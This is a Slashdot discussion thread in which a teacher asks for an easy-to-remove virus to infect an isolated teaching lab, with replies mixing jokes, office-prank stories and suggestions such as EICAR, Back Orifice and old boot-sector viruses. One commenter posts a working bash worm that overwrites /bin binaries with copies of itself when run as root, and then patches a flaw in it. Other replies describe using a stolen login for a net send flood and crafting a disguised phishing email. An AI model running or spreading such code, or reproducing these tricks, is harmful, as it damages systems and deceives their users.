Simple Virus For Teaching?

ed1023 writes "Currently I am teaching a 101 class on computers. It is more of a 'demystifying the black box' type of class. The current topic is computer viruses; I am looking for a virus with which I can infect the lab computers (only connected to local network, no outside network connection) that would be easy for the students to remove by hand. Can the Slashdot community point me in any directions? Is there an executable out there that would work, or do I try to write one myself, or is there one that is written that I can compile myself?"

Obligatory

Well, they're probably infected with one, and you can pass out Live CDs for removal of it.

Re:Obligatory

[cbiltcliffe]

While Live CDs are the best way to remove a lot of viruses, and the only way to remove some, you're just being a dork.

I know, I know....AC and all....

But, instead of doing this pointless crap to get FRSTSOYSPOSGSTTPTT, why don't you do something useful.

Like, maybe point the poster to something that could be exactly what they're looking for:

http://www.bo2k.com/software/index.html
BackOrifice 2000.

Remote control/administration tool, which can be used for all sorts of perfectly legitimate things, or be totally nefarious.
It's also open source, modular, and the client control console will run on Linux.

What more could he want?

Re:Obligatory

[hairyfeet]

Yeah but the odds of running into BO in real life is slim to none, so if you are gonna teach them about bugs, why not something useful? I'd suggest one of the Rogue AV or security tool variants. Those infections are as common as dirt, being in the PC fixit biz I should know, and removal involves all the classics...F8 boot into safe mode, deleting the reg keys, then running a nice CD or USB key scanner (I'd of course recommend CD, as it is cheap and easy). Hell you can have them make their own AV Rescue Disc which then they can take home with them, and is a nice tool to have.

So I guess the real question is if this is gonna be a BS class, where you teach them something that the odds are virtually zipola of running into IRL, or give them a nice overview of how to DIY fixit work? Because while the Security Tool variants freak out the users they are actually pretty damned easy to kill once you know what you are looking for, and pretty much any bug short of a rootkit follows the SOP bugs like Security Tool use. IMHO it would be a good all around lesson, and as long as the machines aren't on the net not a threat. As a bonus you would give them an up close and personal glimpse at how scareware works, which sadly is becoming QUITE popular for malware writers. by knowing the signs and being able to spot the phonies they can actually help their less clueless relatives and be safer themselves.

Re:Obligatory

[cbiltcliffe]

and pretty much any bug short of a rootkit follows the SOP bugs like Security Tool use.

Might want to check your methods, there.
Last several installs of SecurityTool I've seen included a rootkit.

Re:Obligatory

[upside]

Not a virus.

Re:Obligatory

Thanks! I frequently use compact disks to access binary software code and a range of other electronic files on my personal desktop computing workstation, so I anticipate the link you provided will be very helpful.

See you around here!

Re:Obligatory

[Short+Circuit]

Yeah but the odds of running into BO in real life is slim to none

You've never actually been in a college computer lab, have you? I worked in one for five years, and sometimes I still think I pick up a whiff.

Re:Obligatory

[davidshewitt]

removal involves all the classics...F8 boot into safe mode, deleting the reg keys, then running a nice CD or USB key scanner

A good practice when encountering an infected machine is to back up all of the data and then reinstall the operating system. You don't know what code the virus contained, and some viruses/rootkits can be very good at making copies of themselves and hiding themselves very carefully. Also, virus scanners cannot detect all viruses because a virus can be new enough to not be in the definitions list (especially a problem for a CD scanner). While you do make the point that some of these viruses (the non-rootkit types) are trivial to remove, it's a good idea to be safe and nuke the machine, despite that process being a pain in the ass. You really don't know for sure what the virus has done to the infected machine.

Re:Obligatory

[codeguy007]

Backing up first is always best. However reinstalling should only be a last resort. With the right software, you should be able to find and remove all viruses in a lot less time than reinstalling. If you come across something that you just can't remove then reinstall. Also before restoring the backup make sure you scan the files.

What OS? And how annoying?

[canyon289]

What OS are you running? You could create a simple bat script that pops up an annoying message every 20 or 30 minutes to show your students an "infected' machine.

Re:What OS? And how annoying?

[celardore]

That reminds me of something I did when I was a bit younger. I was leaving the company that day anyway, and some dude had been bugging me for months. At some time previous I'd shoulder-surfed the IT departments "test" account, which I logged onto on an unused PC in the office. I created a simple .bat file

start:
net send annoyingguy "message i wanted"
goto start:

Or something along that vein. I can't remember exactly how I made it work, but possibly by leaving the PC on, monitor off, when I left work the last time.
The boss knew the people I went to work for so it didn't end well for me, but looking back it was incredibly funny and the couple weeks out of employment turned out to be very beneficial to my career in the long run.

I heard a couple months later from some old co-workers that it took IT about two days to figure out and in the meantime, old mateys account was unusable.

Live and learn I guess. Was still funny, and incredibly basic.

Re:What OS? And how annoying?

[tibit]

Two days to run wireshark? LOL.

Re:What OS? And how annoying?

[crisco]

Back in the late 80s we had a bunch of 10MHz XT clones in a computer lab networked together using Novel and 10BASE2 or maybe even TokenRing. Some of the games we had ran timing loops for the original 4.77 MHz PC so we had some simple TSR that sat on the interrupt timer and ran some NOPs to slow the computers down. I thought it would be a funny prank to add this to the AUTOEXEC.BAT file on most of the boot floppies in the lab, sadly I didn't test it on more than one computer.

The interrupts and NOPs interfered greatly with the network cards, causing the whole thing to come crashing down when more than a couple of the computers were running at a time. It took at least a couple of days for the sysadmin to sort it out.

RIP George, thanks for introducing me to the Internet and I'm sorry that you didn't get to stick around for Linux and /. I should have taken your Minix class when I had the chance.

Re:What OS? And how annoying?

[Some1too]

I had some mod points but i'll waive using them to tell this funny story:

I worked at a head office for a large oil and gas company in their call centre. One day a net send message popped up on all the computer screens in the office: (I've changed the wording to protect the guilty) "I'm XXX and I like licorice".

I laughed to myself, clicked ok to the message and then suddenly the phones began to ring off the hook. The amount of callers waiting on hold kept increasing to unimaginable numbers. A few minutes later one of our second level guys walked in and we asked him to sit down and help us with the call volumes due to some idiot who had sent a net send message to the complete company (50 floors of employee's).

The guy turned completly red sat down and started taking calls after calls. It was then that we immediately knew who the guilty party was. He wanted to send a net send message to one of the other tech guys in the building but had sent it to the whole domain instead.

Needless to say he was known as the licorice guy from there on out.

I've always wondered if he stopped using net send....

Some1too

Re:What OS? And how annoying?

A story that has played out countless times at countless companies. I've witnessed it twice in different companies (different decades even) myself.

Re:What OS? And how annoying?

even worse; two days to go to the "victims" computer and type "net stop messenger". If it really took two days, they weren't the sharpest IT folks around. Of course, it sounds apocryphal because the messenger service only shows 1 dialog at a time so a user can position it off to one side of the screen and leave it there and not get bothered. I guess this was a long time back, because modern versions of Windows don't have the messenger service enabled anyway.

Re:What OS? And how annoying?

[Nikker]

Ha! I did something similar but during the first week of my first job after graduation. One of the IT staff was tracking down or attempting to track down an ip and find the hardware. I used the same command to send the pc a message so we could track it down. Feeling cool about everything I started sending "floppy drive on fire" messages to co-workers, little did I know the entire coast to coast operation was running in the same domain so "net send * 'floppy drive on fire'" sent to every office and warehouse from Vancouver BC to Newbrunswick. Lucky for me I was in the head office and the senior guys got a kick out of it. Next day IT came to my machine and told me I had a virus I got most of the day off to get a coffee. Those were the days.

Re:What OS? And how annoying?

[insufflate10mg]

The submitter should use something like Visual Basic (6.0 or .NET, whichever is more suitable for the OS) to program a custom "virus" that can do whatever he wants it to do. After giving them several tips and letting them attempt to diagnose/fix it, he can simply tell the students exactly how to disable it from doing what it does (pop-ups, file deletion, keyboard hooks, phoning home, etc). It's exactly what I would do and it would provide the students with a great hands-on learning experience.

Re:What OS? And how annoying?

[KevMar]

When I was in high school we had a pre-windows PC lab of 15-20 computers and a Mac lab of 12-14 computers. One day I returned to the PC lab at the end of the day for something and I saw the PC teacher and the Mac teacher sitting at a computer. They called me over to them asking if I knew anything about this.

They told me this computer had a virus and it had my name on it. As soon as they said that, I remembered what I did. I did a net send to all the computers in the PC lab with the message "This is a virus" earlier in the day. They were not happy with me at the time and it took a bit of work for me to explain that it was not a virus, just a message saying it was a virus.

Re:What OS? And how annoying?

This. It would take less than 30 lines of code to do everything he mentioned -- ridiculously simple.

Re:What OS? And how annoying?

[Hojima]

What OS are you running?

This is very important, because if you use a Mac you can't get a virus on it. /joke

Re:What OS? And how annoying?

[arth1]

If Linux (or similar), here's an example of a worm that spreads itself on the local host whenever executed as root:

#!/bin/bash
 
if [ -O /bin/su ]; then
  mkdir -p /bin/.infected
  TARGET="/bin/ls"
  if [ -e /bin/.infected/ls ]; then
    TARGET=$(for i in $(find /bin -type f -prune); do
      echo 0$RANDOM $i
    done | sort | head -1 | cut -d' ' -f2-)
  fi
  if [ ! -e /bin/.infected/$(basename $TARGET) ]; then
    mv $TARGET /bin/.infected/
    cp $0 $TARGET
  fi
fi
ME="$(basename $0)"
if [ -x /bin/.infected/$ME ]; then
  PATH=/bin/.infected:$PATH
  $ME $*
  if [ $RANDOM -gt 30000 ]; then
    echo "Something wonderful has happened ... your machine is alive"
  fi
fi

Save as "virus"
chmod +x virus ./virus
rm -f virus

Re:What OS? And how annoying?

[Power_Pentode]

I'll admit it. About 10-15 years ago I did the same thing from a QA domain to the corporate domain, thinking that the domain arg was a qualifier for net send. The intended recipient got my message requesting assistance, along with about 150 other people. Sadly, the only person who contacted me was a marketroid who rang me up and asked what he could do to help. I'm no longer quite so quick to stereotype people.

Re:What OS? And how annoying?

[arth1]

Windows IT guys can be clueless. In a previous job, IT insisted on shutting down my machine and take it away for cleaning because I saved the EICAR test string in cygwin so I could test my Unix boxes' clamav with it. There was no convincing them that the string "X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*" wasn't a virus.
Not even my creds as the author of the world's first heuristic AV scanner, nor my certifications were believed, because Symantec Antivirus claimed it was a virus, so it had to be.

That ITs internal HP printers LCD panels suddenly started displaying "INSERT COIN" had nothing to do with this, I swear.

Re:What OS? And how annoying?

[gagol]

I can remember two events in my early teen computer life :

1. My first computer class in high school involved programming in logo writer. I asked the teacher how to program sound and he told me it was impossible. I did a little experimentation and found how it worked and created a high pitched beep (15KHh) that lasted too long for the teacher's taste

2. One of my sucker "friend" found one day a floppy disk in his street that contained a "Dragonball pictures downloader", in fact I created it with my friend in VB and it deleted random files in his Windows and Program Files folder, of course the close button did not worked. The trick did not worked, as he continued to speak with us afterwards...

Re:What OS? And how annoying?

In high school we were in an after school computer club, and we were bored and spamming net send *'s to each other basically trying to overwhelm others, we did this for all of 3 minutes. Since it was after school and we were the only people in the computer lab, we really didn't see the harm in it. Unfortunately, every computer in the school got the spam messages. Since it was after school, only a few teachers and offices got interrupted we didn't really get in trouble but got very stern warnings about messing around like that.

Re:What OS? And how annoying?

[xandercash]

I'm having a similar problem right now. An app I'm working on which does some low level socket networking keeps being flagged by Symantec's active scan as a virus. I'm not sure why, yet, but IT keeps telling me my computer is infected (as discovered by their nightly scans). I've explained more than once that it's an innocuous program that I wrote myself, and have assured them many times that it is NOT a virus. But they believe Symantec over me. It's VERY annoying when I compile the app and Symantec decides to delete it an hour later. Or when it's running and suddenly stops because Symantec suspended the process. It was funny the first time. (where'd the exe go? I know it was here somewhere...) but it's gotten quite tiresome. Then there's the OTHER conversation. "Why did you disable your antivirus? That's against company policy" "It keeps flagging my project as a virus" "Well, then don't write a virus...."

Re:What OS? And how annoying?

[arogier]

What about picking up some old system 7 Macs and nVir? This should hopefully pose a low risk for the rest of the school.

Re:What OS? And how annoying?

[bennomatic]

A friend of mine was working in a PR firm some years back, and he was probably the techiest of all of them, including the IT team. They were using Lotus Notes, and he found that he could script links in emails that he sent. This allowed him to send an email to someone that told them to check out an attachment, and when they clicked on it, it looked like nothing happened, but it would actually be sending out an email that he had scripted from their account. He had a few weeks of playing around with it, laughing at all the consternation about people receiving emails that the senders swore they hadn't sent--often many copies--before he decided that he'd better stop before he got caught.

The one I remember was that he had one of his colleagues email the CEO of the company something like, "Jim (not his real name), Chicken pot pie, chicken pot pie, chicken. Chicken pot pie, chicken pot pie, chicken." Since the attachment didn't work, the colleague clicked it 50 times, but didn't make the connection when Jim complained to her that she'd sent him 50 meaningless emails.

Re:What OS? And how annoying?

[cgenman]

Does it even need to be an OS virus? A word macro virus can be an inherently sandboxed virus that is easy to see, understand, and clean.

How technical is this computing 101?

Re:What OS? And how annoying?

What OS are you running? You could create a simple bat script that pops up an annoying message every 20 or 30 minutes to show your students an "infected' machine.

Not a good first question.

First Question: How old are the students? If they are kids (gradeschool, jr high, high school, etc.) then it's a bad idea to start with and you shouldn't bother going any further. If they're adults, you can proceed but this probably isn't something you should do in a basic class.

So here's what I recommend, since it's probably illegal to develop your own malware. Get a single computer, like a used one from a pawn shop but make sure it's CHEAP. Paint it read or put a jolly roger on it and setup bright signs that tell people to not Fuck Around. Install an insecure OS such as windows, Mac OS, or Linux***, and then do what you can to further open them up (disable firewalls, use weak passwords for admin/root accounts, turn on remote services, share files/folders, etc.) Disable USB ports (use old-style keyboard/mouse connectors) so that nobody puts a jump drive on the system. Make sure there is no CD/DVD burner but just a read only CD/DVD drive. Now start browsing the web. Use Internet Explorer or Safari if possible, those are the two most vulnerable browsers right now *** and make sure things like link scanning and other 'safe surf' options are turned off. Go to some porn sites. click on ALL the popups. Accept everything. Allow everything. Eventually you will get infected with a variety of malware. Once this happens, be sure to remove your network cable so you don't end up being a spam/virus redistribution box. Do NOT leave the box running unless you are in the room. At the end of the day the system should be powered down, rebooted via a known Clean boot Cd/DVD, and then wipe the drive to nothing. do NOT leave the box installed or usable in any fashion.

And good luck. If you're not very, very careful while doing this, you'll need it while looking for your next job.

*** term 'insecure' based on OS performance during annual pwn2own contest. Argue with the guy who hacked all 3 OS's about how secure they are, TYVM.

Re:What OS? And how annoying?

[upside]

A bat script is not a virus. I take it he wants a virus or a worm; something that infects a machine, not something he installs.

Re:What OS? And how annoying?

net send * "lolol"

was sooooo much better.

Re:What OS? And how annoying?

[ArsenneLupin]

Two days to run wireshark? LOL.

It was a Windows shop.

Re:What OS? And how annoying?

[ArsenneLupin]

Another fun prank from the DOS days: A TSR program that hooked in the keyboard interrupt, and if it detected that it was called from Turbo Pascal, and that the sequence for compilation was called, it would locate the editor buffer and randomly change a couple of semicolons to colon.

This was both annoying as hell (plenty of syntax errors), and difficult to positively blame on mischief as:

• Colon and semicolon are on same key, so easy to blame on typo (phat phingered the shift key)
• On those crappy monitors that we used back then, it was really difficult to tell colon and semicolon apart

The TSR was called <shift-space>.com and so a cursory perusal of the autoexec.bat would not reveal its presence, as shift-space just looks like a normal space (... but can be the name of a command)

IT spend an entire day trying to re-install Turbo Pascal, and the problem still persisted... (because it was in an independent TSR, not in the Turbo Pascal app itself)

Then, the next day, re-install of the entire system.

Another fun TSR one was the annoying keyboard beep. The TSR had a timetable of the classes build in, so that the keyboard click would be very short and almost unnoticable at the beginning of the class, and then gradually grew longer and longer during the class (first a faint click, than a more obvious click, and by the end of the hour an annoying beeeeeeeeeep). Fun thing is, as it was gradual, nobody really noticed when/how it started, but eventually that background noise was "just there"...

A, those were the days of highschool pranks...

Re:What OS? And how annoying?

[CoolVibe]

Hey! Don't shoot the messenger! :)

Re:What OS? And how annoying?

[lewko]

It looks like you're writing a joke.

Would you like help?

Re:What OS? And how annoying?

[lewko]

Not computer related, but similar.

A friend of mine carried a pager years ago. I wrote a script to send a message to his pager every morning at 3am, saying "Low Battery".

Re:What OS? And how annoying?

well, if you running windows, you already have a big kick ass virus to show them!

Re:What OS? And how annoying?

Why are you creating something like this on a network connected, production PC to begin with? If your smarter than us "clueless Windows IT guys" then you should know that in a corporate or government environment, no matter what, if the AV says something is there, the PC gets re-imaged. No exceptions. At least in every enviroment that I've managed.

If you are authorized to do this then you should have a segregated test machine.

Re:What OS? And how annoying?

[lorg]

mmmm ... virus nostaliga. Wonderful SCA reference you manage to squeeze in there.

Re:What OS? And how annoying?

[dawich]

"That ITs internal HP printers LCD panels suddenly started displaying "INSERT COIN" had nothing to do with this, I swear." Ah, playing with LaserJet front panels... Making them talk to the person stand at the printer...

Re:What OS? And how annoying?

[operagost]

The payload probably isn't as important as the means of propagation, or the other elements such as polymorphism.

Re:What OS? And how annoying?

[Just+Some+Guy]

cp $0 $TARGET

Note that if [ $TARGET = "cp" ], you'll have some explaining to do at this point.

Re:What OS? And how annoying?

I decided to change the printer LCD panels to say "RADIATION LEAK" at my last job. It turns out we shared the printers with the sales staff. My boss thought it was funny as hell when a sales guy wandered into his office to complain about the printer leaking radiation.

Re:What OS? And how annoying?

[Quirkz]

Similar to your story, in the very old Macs it was trivial to replace the startup screen with an image of your choice by giving it the right name and putting it in the right place. One day I whipped up a little bomb picture (similar to the normal Mac has crashed error message that any Mac user should have recognized) and a silly message saying "this system will self destruct in 10 seconds." I put this image on one of the computers in the journalism lab, thinking the other students would get a kick out of it when they started the computer up in the morning.

As luck would have it, that day a secretary from one of the other departments needed to type something up first thing that morning and picked that very computer. Not particularly savvy and not used to Macs, she saw the message and flipped out.

Thankfully the journalism teacher knew what was going on, assured her everything was fine, and quickly figured out I was behind it. He didn't get too mad, but did make me take the picture off before anyone else got to see it.

Re:What OS? And how annoying?

[arth1]

Note that if [ $TARGET = "cp" ], you'll have some explaining to do at this point.

That one is easily fixed by moving the "PATH=/bin/.infected:$PATH" stanza to the top of the script, so if cp has been moved, it will still be found. A side benefit(?) is to slow the rate of infection.

Re:What OS? And how annoying?

[arth1]

A segregated test machine wouldn't have access to the Unix boxes I admin, so your suggestion is, in typical IT fashion, completely useless.

No, the problem here is that someone who hasn't even heard of AV test strings or understands the first thing about false positives[*] shouldn't be allowed to run and install AV software on other people's machines, and much less make decisions about those machines. For one thing, it means that they haven't even tested their AV software themselves, and installed untested software on the corporate network. In my opinion, that should be reason enough for disciplinary action.

[*]: In this case a deliberately false positive. Which Symantec even tells you if you bother to follow the link it throws up for EICAR test string when it encounters it.

Re:What OS? And how annoying?

[Coren22]

Yeah, so? It would take me 5 minutes to track this down, and I work in a "WIndows Shop"

Re:What OS? And how annoying?

[tibit]

I have no clue why would anyone consider this a troll post. Outrageous, unbounded incompetency -- yes, it deserves a LOL at best. Some "IT" department that was. Gimme a break.

Re:What OS? And how annoying?

[tibit]

It just gets better and better. Like reading a TDWTF thread. FYI: Wireshark runs on Windows. IIRC it has been running on Windows back when it wasn't even called Wireshark...

Re:What OS? And how annoying?

I created a very simple "virus" in QuickBasic once... just for the heck of it.

What I did, was simply to create and delete an empty file on the HD, so the LED blinked..... then of course it was a matter of timing the text output so it read "format drive c: % complete" (where incremented every 5 seconds or thereabouts). I showed it to my teacher, and he said I should try and fool one or two of the less computer literate guys with it....

My GOODNESS they panicked :lol

Re:What OS? And how annoying?

[fallungus]

Something basic, a "Fuck you, World" application.

Re:What OS? And how annoying?

[zill]

GEORGE! After all these years your tongue finally slipped!

Re:What OS? And how annoying?

[zill]

For some reason I read your comment in Chris Hansen's voice...

Re:What OS? And how annoying?

[uninformedLuddite]

Hex editing command.com to reply with funny messages was always entertaining.

Stuxnet

Simple worm for beginners!

Re:Stuxnet

[flappinbooger]

I vote cybergate rat or similar, built to not inject or hide. Other "viruses" are too nasty nowadays (think virut ...), unless you get ahold of a copy of one of the EARLY fake A/V's, as in earlier this year or last year.

Otherwise the teacher of this class will have next week's lesson "how to re-image a room full of computers".

A fake A/V isn't too hard to harvest.

Sure

[Peach+Rings]

Here, let me link you to an executable file so you can download it and run it on an entire lab of computers. It's safe, don't worry.

Re:Sure

[pinkushun]

Dear Sir / Madams.

I am a big fan of your soft wares, please send me your banking details so I can deposit you your payment.

signed
- viker bandin

EICAR

http://en.wikipedia.org/wiki/EICAR_test_file

Re:EICAR

He wants a live virus to train removal from the system, not a dummy virus to test the AV software.

Re:EICAR

[timothyf]

Then he's pretty stupid for wanting that. This'll look exactly the same as a real virus, and it will be easy to clean off, but it won't propagate or do nasty things like a real virus. For a computers 101 class, anything more than something like this is just asking for trouble.

Re:EICAR

[timothyf]

Sorry, exactly the same as a real virus to scanning software.

Re:EICAR

[moonbender]

The file is simply a text file of either 68 or 70 bytes that is a legitimate executable file called a COM file that can be run by Microsoft operating systems and some work-alikes (except for 64-bit due to 16-bit limitations), including OS/2. When executed, it will print "EICAR-STANDARD-ANTIVIRUS-TEST-FILE!" and then stop. The test string was specifically engineered to consist of ASCII human-readable characters, easily created using a standard computer keyboard. It makes use of self-modifying code to work around technical issues that this constraint makes on the execution of the test string.

Wow, that's pretty cool. Here's the string: X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

Re:EICAR

[rpresser]

Thanks, dude. My virus scanner just started complaining about my browser cache.

Re:EICAR

[budgenator]

That might be an interesting comment string inside a jpeg.

Re:EICAR

Ok then, write a bat file that deletes a few files, makes a few registry entries and run it? Call it the "lab_training_virus". I don't understand what having a real virus actually infecting the computer is going to give in training value. Simulate the results of one and you can do the same thing. You have two ways to remove a virus, an automated solution from antivir software or you do it manually based on what it infects. Neither is of any value to a trainee because one is automatted (training value is run a scan and watch the software clean it) and the other is very specific to the virus and what it does and only requires basic windows skills to remove, not some keen ninja antivirus removing skillz..

Re:EICAR

[JWSmythe]

    I was surprised this didn't have the "What could possibly go wrong" tag. :)

    Note in the question he did say "... do I try to write one my self ...". I've seen quite a few reports where someone wrote a proof of concept virus that was just a bit more virile than they thought, and it ended up everywhere. It'll lead to that "Oops, I thought I prevented it from doing ..." This is fun, we get a front row seat to someone making a complete ass out of themselves. I hope it doesn't cause too much trouble..

Re:EICAR

[SQLGuru]

I'm pretty sure you can find the Melissa virus around somewhere. Mostly benign. http://support.microsoft.com/kb/224567

Not overly difficult to remove. Isolated to Word. Doesn't do perm. damage.

Re:EICAR

[arth1]

Thanks, dude. My virus scanner just started complaining about my browser cache.

No, it didn't, because that is only to be detected as a virus if it's a file by itself.
However, this might trigger on the most paranoid virus killers:

begin 755 eicar.com
M6#5/(5`E0$%06S1<4%I8-30H4%XI-T-#*3=])$5)0T%2+5-404Y$05)$+4%.
85$E625)54RU415-4+49)3$4A)$@K2"H*
`
end

Re:EICAR

[yuna49]

EICAR is detected by all AV products including ClamAV.

I'd put it in a zip file, then attach the zip to an email message. Show how real viruses propagate by mail. How about putting a copy on a USB pendrive then running eicar.com from Autostart? Any Windows AV product with a decent autoscanner should detect both of these and pop up a warning.

If you want to get really fancy you can set up a Linux box running MailScanner with ClamAV and send an "EICAR-infected" e-mail message through it. You'll see MailScanner detect the virus, put it in a quarantine, and send notices to the admin and, optionally, the sender.

For a lay audience I think it's more important to stress the vectors than to concentrate on the payload itself.

Now if you could only find a site distributing Antivirus 2010. If you do, make sure you're using a Linux machine when you visit the site. If your class understands that there's more to the world than Windows, see how long it takes them to understand why there can't really be an AV program "scanning the C: drive."

Re:EICAR

[yuna49]

Oh, how about one more example?

Put eicar.com on a website, then send an email with a embedded URL and a subject line having to do with nude celebrity videos. You know, the "Hey dude! Wassup! Check out this hot video of Angelina and Brad getting it on!" variety.

Make sure you craft an HTML version so the URL isn't displayed or use a TinyURL link.

Re:EICAR

[xouumalperxe]

This'll look exactly the same as a real virus, and it will be easy to clean off, but it won't propagate or do nasty things like a real virus.

It's too easy to remove. Delete the file, et voilà. If the point of the exercise is "Viruses aren't that daunting, they're just a bit of work to remove", the EICAR test file is as adequate as telling people "check that 1 + 1 returns 2" to teach them how to properly use a calculator

Re:EICAR

[leuk_he]

in a 101 course you should not play with things that could have bigger consequnese if something went wrong.

SO:
-Eicar will trigger a virus scanner. easy enough. If it breaks free from the lab it will do no harm(as explained by others)

-If you want something hard to remove let them manually remove MSN live, or some other autoinstall package, where you remove in from the control panel, so the unintall option is not available.

-You want a package that can do more harm? Install VNC as a service by hand,and add RDP You can take over their PC for extra shock points.

Re:EICAR

[pinkushun]

How did I not know about this, thanks! :)

Re:EICAR

What I'd like to know is: how did you guess my Windows password?

You may already have one

Windows? Fairly easy to remove.

Re:You may already have one

[monkyyy]

troll? no this should get +5 insightful

Re:You may already have one

[spazdor]

:p
Bringing up Windows in a question about viruses? You're right, that takes a huge leap of insight and originality here on Slashdot!

Re:You may already have one

[The+Hatchet]

funny? no this should get +5 troll

Fixed if for you.

Now that that is done, I might note that Windows doesn't act like a virus. You can easily remove it, it doesn't spread across things and tell you what you are allowed to do, if you know how to use it. Apple and apple products on the other hand are as close to virii as an operating system can get.

Re:You may already have one

[Krneki]

Windows? Fairly easy to remove.

Easy you say?

Every time I manage to replace one with a Linux box, I get an asshole who installs 2 new. This shit is spreading like plague in our VMware environment.

Norton

[cjfs]

I don't even know if I'm joking.

Re:Norton

[frosty_tsm]

I don't even know if I'm joking.

You missed a requirement: easy for the students to remove by hand

Re:Norton

[offrdbandit]

That's not gonna work. The OP wants the students to be able to remove it.

Re:Norton

[Dogbertius]

Don't feel bad. I've been tricked into installing Norton as well :(

Re:Norton

[Cipher13]

He did specify that it should be "easy to remove by hand"...

Re:Norton

[syousef]

I don't even know if I'm joking.

You missed a requirement: easy for the students to remove by hand

All computer viruses are easy to remove by hand. Just rip the computer out of the electrical and network sockets and throw the computer out the window. Use your hands to do this.

Re:Norton

[cjfs]

You missed a requirement: easy for the students to remove by hand

He didn't say what that hand was holding...

Re:Norton

[Ihmhi]

You can use an acetylene torch with just one hand, I'm sure.

Re:Norton

[gagol]

An arc welder would also do the job. I am pretty sure the virus would be gone. The real challenge is to keep the computer operational...

Re:Norton

[nemesisrocks]

I don't even know if I'm joking.

You missed a requirement: easy for the students to remove by hand

I presume he meant Norton was the virus. In which case, even Symantec can't remove it, let alone by hand.

Re:Norton

[plcurechax]

You missed a requirement: easy for the students to remove by hand

I took that to mean that the kids needs a steady hand and very tiny magnetic needles to physically edit the disk sectors by hand.

I just figured it was a gym teacher stuck teaching home-ec (economics, "domestic science") class that was bored with knitting stupid hats.

EICAR?

This has been around forever. http://www.eicar.org/anti_virus_test_file.htm

Re:EICAR?

[Barny]

No, the guy wants a live virus that the students need to be able to remove, not an inert file that will simply trip an AV scanner to remove it.

CIH

This looks like a good candidate. The good ol' times...
  When you caught one, well, that was a lesson learned. Viruses are not what they used to be, but that's just the old fart in me talking.

IP/Login?

What's your IP address/login? I can help with a sample virus.

Re:IP/Login?

[lewko]

127.0.0.1

Note to self...

[tool462]

Do NOT click on any links posted in the comments on this article.

Re:Note to self...

[h4rr4r]

Note to tool462, stop using windows.

Re:Note to self...

[ROMRIX]

I did, now my computer pops up a message every 5 minutes saying "All your Base are belong to us!"
damit..

Re:Note to self...

But then how would he be a tool!?

Re:Note to self...

[PHAT64]

Best post so far. As a response to a few of the hidden comments from the anonymous cowards:
- He's not being a dick. It's actually great advice.
- Yes, there are exploits for linux, assuming he's using linux, fuckhead.
- You don't make sense.
- Most of the links on this post, possibly all, only affect Windows.
- He is a tool.

To beav007: Protip: Shut up. Go act smart somewhere else. Your input is useless.

Re:Note to self...

[flyingkillerrobots]

Wrong. If I were attempting to place infected links onto a slashdot forum, I would probably use something targeting Linux, as it has a significant market share in this community, and the targets tend to be more confident that they won't get viruses.

Re:Note to self...

Uninstall Windows.
Stop being able to perform work to satisfaction.
Lose job.
Miss mortgage payment.
Become homeless.

Your superiority complex isn't helping.

Re:Note to self...

Glad I'm using Windows, where my biggest worry is not clicking on links that say "here's a virus".
Must suck to be using whatever FOSStard system you're using.

Re:Note to self...

[mcgrew]

Exploit != virus. Any computer can he cracked, but only Windows computers have viruses in the wild.

Re:Note to self...

[mcgrew]

You should stop listening to Microsoft's marketing department. "Marketshare" is meaningless in this contex*. Apple manufactures millions of computers a year; more than enough to make targeting them with viruses worthwile, yet Apple is as immune from viruses as Linux is. It's a lot harder to write a virus for a Mac or Linux; both have *nix underpinnings. Unix was developed from the get-go to be networked, WinDOS was designed to be a standalone system.

Windows 7 is far more secure than any previous version of Windows, but it's still a hell of a lot easier to break than any other OS.

*Especially when talking about Linux; reatively few copies of that OS are paid for. You can download any distro for free, and there's no good way of counting them all. I've installed Linux on half a dozen PCs from the same downloaded disk, so distro download counts are meaningless. Browser spoofing makes server logs just as meaningless for counting the number of Linux boxes surfing the net.

Re:Note to self...

[mcgrew]

Glad I'm using Windows, where my biggest worry is not clicking on links that say "here's a virus".
Must suck to be using whatever FOSStard system you're using.

Your OS the the only one on on the planet that you have to worry about clicking a link that says "here's a virus". Why would that suck? Are you a malware writer by chance? *Nix/BSD/Apple users have computers that WORK. You don't.

Oh, and a "FOSStard" is someone who isn't smart enough to get rid of the most insecure OS on the planet, dumbass, NOT someone who uses a stable, secure OS that has all the apps needed when the OS is installed. FOSStard? How much did you pay for MS office? How much does McAffee/Symantic get from you every month? Did you have fun punching in that 40 digit gibberish when you installed Windows (or even a new hard drive) so MS knows you didn't pirate it? No, you probably never saw that gibberish, since Windows came with the computer and you never had your PC's case open, and wouldn't know a router from a modem.

Grow the fuck up and stop trying to troll intelligent people, moron. If you're happy with Windows, fine. But there's no call for coming to a nerd site and insulting everyone who has a higher IQ than you (which is probably everybody).

Get back under your bridge, troll.

Re:Note to self...

Merely clicking on a link isn't going to do shit if it's just a virus. And no, you're wrong.

Not a virus

but how about the love bug? ok so you'd have to have the machines setup with vulnerable a vulnerable version of outlook or something but not only do you have an easily hand-removed candidate, your students can look at the script contents afterwards.

Sneeze on them

[airfoobar]

Works on the students, too.

Michelangelo

[extremescholar]

Use Michelangelo, you're favorite Ninja Turtle and March 6th event!

Another Option

Might I suggest a tutorial and a simulator...maybe an LC-3 simulator and stack smashing exercise to demonstrate a method of exploiting poorly written code? See the well written document Smashing the Stack for Fun and Profit.

Re:Another Option

[X0563511]

Yea, er... did you miss the FIRST TWO FUCKING SENTENCES of the post?

Here, in case you really did:

Currently I am teaching a 101 class on computers. It is more of a demystifying the black box type of class.

Stoned

[PacoSuarez]

Stoned is a classic and a pleasure to disassemble. It fits in a boot sector (512 bytes) and it's not particularly malicious, but it has all the elements that a virus needs. I don't know if it would still work on a modern computer, though: Some old viruses used funky instructions that became obsolete (like "POP CS"), and this one seems to have issues working on large-capacity disks.

Re:Stoned

[BlackHawk-666]

IIRC that's a boot sector virus that propagates when a sector read is performed on a floppy drive. Modern labs are pretty unlikely to still have floppy drives. The code to stoned is written in Assembler too, so they would need to be taught that to understand it. They'll also need a good understanding of the old DOS BIOS interupt codes to make sense of what it's doing.

That's all good for us guys who grew up hacking in the 80s, not so great for the modern ones.

Re:Stoned

[itwerx]

Or if you really want to get retro, (and remove any risk of propagation by netwok), get some DOS boot disks and the Pakistani Brain Virus.

(For history buffs: the first "real" PC virus evar, which I hand-disassembled on legal paper so I could write what might have been one of the first virus removal tools - a simple hex edit of the boot sector to skip over its code. :)

Oh, yeah, and get offa my lawn!

Re:Stoned

